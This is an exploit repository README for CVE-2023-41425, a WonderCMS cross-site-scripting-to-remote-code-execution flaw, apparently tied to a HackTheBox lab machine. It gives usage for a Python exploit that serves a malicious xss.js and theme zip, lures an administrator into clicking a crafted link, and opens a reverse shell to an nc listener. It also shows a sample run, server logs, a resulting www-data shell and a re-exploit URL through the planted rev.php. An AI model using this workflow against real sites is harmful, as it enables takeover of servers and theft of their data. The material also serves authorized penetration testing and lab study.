POC details: b714049a7d6c5f8432c515062fb8a6448e6b775b

Title: WonderCMS security vulnerability (CVE-2023-41425)
Description: WonderCMS is an open source content management system (CMS) written in PHP. WonderCMS versions 3.2.0 through 3.4.2 contain a security vulnerability. An attacker can exploit it to execute arbitrary code via a crafted script uploaded to the installModule component.
CVE-2023-41425 (Wonder CMS XSS to RCE) exploit which serves required scripts locally. Good if you're lost at sea and have found a problem with your bike.
# CVE-2023-41425

## Description
A Cross Site Scripting vulnerability in Wonder CMS Version 3.2.0 to Version 3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
This is a modified version of the original exploit by [prodigiousMind](https://github.com/prodigiousMind/), extended to serve the entire exploit locally, with no reliance on an external internet connection.

It's useful if you're all at sea, and have found a problem with your bike...

Note: xss.js is left in the repo for demonstration purposes; the script will overwrite it with your configuration when run.

## Usage

```
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT

WonderCMS 4.3.2 XSS to RCE Exploit

  -h, --help            show this help message and exit
  -u URL, --url URL     The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
  -lh LHOST, --lhost LHOST
                        The IP address for the reverse shell listener
  -lp LPORT, --lport LPORT
                        The port for the reverse shell listener
  -sh SRVHOST, --srvhost SRVHOST
                        The local IP serving the malicious XSS JavaScript
  -sp SRVPORT, --srvport SRVPORT
                        The local port serving the malicious XSS JavaScript
```

## Example

Note: This exploit can be quite slow to work! 

```
$python3 exploit.py -u http://sea.htb/loginURL  -lh -lp  7777  -sh -sp 8888
# Wondercms 4.3.2 XSS to RCE     #
# Original POC by prodigiousMind #
# Updated version by Ducksec     #

Check you got this stuff right!

Parsed arguments:
URL: http://sea.htb/loginURL
LPORT: 7777

[+] xss.js is created
[+] Execute the below command in another terminal:

nc -lvp 7777

Send the below link to admin:


[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.

[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=

Starting HTTP server to allow access to xss.js
Serving HTTP on port 8888 ( ...
 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
```

```
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
```

## References
1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3

## Disclaimer
This code is provided for educational and ethical security testing purposes only. It should be used responsibly and only in environments where explicit authorization has been granted. Unauthorized or malicious use is strictly prohibited. By using this code, you agree to adhere to all applicable laws, regulations, and ethical standards applicable in your jurisdiction. The creators and contributors disclaim any liability for any damages or consequences arising from the misuse or unauthorized use of this code.

```
[4.0K] /data/pocs/b714049a7d6c5f8432c515062fb8a6448e6b775b
├── [4.3K] exploit.py
├── [2.6K] main.zip
├── [4.0K] README.md
└── [1.3K] xss.js

0 directories, 4 files
```